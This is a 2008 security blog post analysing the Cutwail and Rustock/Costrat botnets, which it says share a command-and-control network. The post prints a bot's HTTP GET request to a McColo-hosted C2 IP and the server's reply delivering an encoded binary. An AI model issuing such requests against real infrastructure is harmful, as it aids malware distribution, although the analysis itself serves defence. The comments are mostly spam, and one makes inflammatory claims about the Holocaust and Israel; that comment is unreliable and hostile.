Cutwail and Rustock/Costrat: Same Command-and-Control Network
September 24th, 2008 — bjouYesterday I posted an analysis of Cutwail, today, while analyzing a Rustock/Costrat binary, I found something interesting:
Cutwail issued the following command to 208.66.194.232:80 (hosted by McColo, known for hosting nefarious stuff)
GET /40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED HTTP/1.0
receiving the answer from the web server
HTTP/1.0 200 OK
Date: Fri, 29 Aug 2008 18:21:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 29 Aug 2008 18:21:44 GMT
Cache-Control: no-cache
Content-Length: 326160
Connection: close
Content-Type: application/octet-stream
followed by an encrypted/encoded binary. I have not been able to check that file out by now, but I might provide it to the interested reader upon request. The Rustock/Costrat binaries connect to the same network. These connections by Rustock to 208.66.194.0/24 are verified by Symantec and ThreatExpert.
Yet another proof that the top spam botnets are linked together in certain ways, this time in command-and-control.
October 3rd, 2008 at 6:39 pm
Hi Björn!
Try this webpage as well:
http://anubis.iseclab.org/
They do the same like Symantec and ThreatExpert but provide more details on the filesystem, registry or process activities.
Note: The section “General Information” does not show the system behavior caused by your binary only. It is a general view on the system.
Downloading the file from the webserver mentioned above brings this result:
http://anubis.iseclab.org/result.php?taskid=f39a0f6ee6d65b34298a46b7b683414c&refresh=1
Seems to be inoperable in this format. (encoded)
Perhaps you have an already decoded version to analyze.
Best wishes …
Florian
November 16th, 2011 at 2:44 am
I just wanted to type a small remark to appreciate you for the awesome recommendations you are posting here. My rather long internet research has now been compensated with excellent facts and techniques to write about with my pals. I ‘d declare that many of us visitors actually are unquestionably endowed to be in a remarkable site with so many marvellous individuals with beneficial things. I feel really happy to have come across your entire web page and look forward to plenty of more enjoyable times reading here. Thank you once more for all the details.
December 2nd, 2011 at 2:09 pm
Servus, ich bin mal so frech und poste mal was auf deinem Webseite.Sieht ja eigentlich alles ganz vernünftig aus!Momentan beschäftige ich mich auch mit dem Thema eigener Wordpressblog , allerdings suche ich noch ein passendes Theme und suche ein paar Wordpress Blogs durch,wo ich vielleicht etwas passendes finde als Anregung! MfG Mario
December 15th, 2011 at 8:44 pm
Just need to say your web site is striking. The clearness within of your established up is merely magnificent and i can consider on for granted you may well be an skilled on this field. Nicely with each other together with your permission permit me to grab your rss feed to preserve as a lot as evening with forthcoming publish. give cheers for you a million bucks and be sure you preserve up the productive operate.
December 25th, 2011 at 9:58 pm
Thank you for sharing superb informations. Your web-site is so cool. I am impressed by the details that you have on this website. It reveals how nicely you perceive this subject. Bookmarked this web page, will come back for extra articles. You, my pal, ROCK! I found simply the information I already searched everywhere and just could not come across. What an ideal web-site.
January 5th, 2012 at 8:27 am
Who’s disregardi-ng the Holocaust? There is no other country besides Israel that is more obsessed with the Holocaust than the US. Why is it that the people who invoke the Holocaust the loudest themselves don’t do self-refle-ction to see what all tragedies they have been imposing on others?best diablo 3 gold